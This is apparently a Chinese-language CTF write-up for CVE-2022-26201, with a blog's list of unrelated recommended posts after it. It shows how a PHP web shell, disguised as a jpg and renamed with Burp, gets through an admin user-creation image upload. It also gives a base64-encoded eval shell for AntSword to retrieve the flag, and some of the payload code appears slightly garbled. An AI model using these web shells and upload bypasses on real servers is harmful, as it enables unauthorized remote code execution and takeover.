CVE-2022-26201

打开是这么个页面

左上角找到Admin访问

里面有个Add Users,访问一下,能创建用户,有个能上传图片的地方

普通的一句话木马无法访问flag,需要创建一个权限马

<?php system($_GET1);phpinfo();?>

因为只能上传jpg形式的文件,所以更改文件后缀名为jpg

使用bp抓包,更改后缀为php,使用重放器发送

上传成功

访问img/上传的php文件名 /flag,得到flag:flag{a71683b4-9a2d-4288-b8f3-25d10816b1c0}

第二种方法使用蚁剑马连接

一句话木马是有防护的,所以我们要利用php和base64来构造一个特殊马来进行连接:

base64先对一句话木马加密<?php @eval($_POST'a');?>

木马内容:

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+'));

?>

然后跟上边一样bp抓包改包,重放器发送

生成shell.php文件,木马是以base64的形式。

蚁剑路径为img/shell.php,编码器为base6,根目录下找到flag

相关推荐
llz_1127 分钟前
web-第二次课后作业
前端·后端·web
大数据魔法师4 小时前
Streamlit(二十三)- 教程(二)- 动态导航
python·web
大数据魔法师20 小时前
Streamlit(二十)- API 参考文档(十三)- 缓存与状态管理组件
python·web
大数据魔法师1 天前
Streamlit(十三)- API 参考文档(六)- 媒体展示组件
python·web
大数据魔法师2 天前
Streamlit(十八)- API 参考文档(十一)- 页面导航组件
python·web
大数据魔法师2 天前
Streamlit(十七)- API 参考文档(十)- 身份认证与用户信息组件
python·web
OpenTiny社区2 天前
操作ArkTS页面跳转及路由相关心得
前端·typescript·web·opentiny
还是鼠鼠3 天前
AI掘金头条新闻系统 (Toutiao News)-获取用户信息
后端·python·mysql·fastapi·web
大数据魔法师3 天前
Streamlit(十二)- API 参考文档(五)- 输入组件
python·web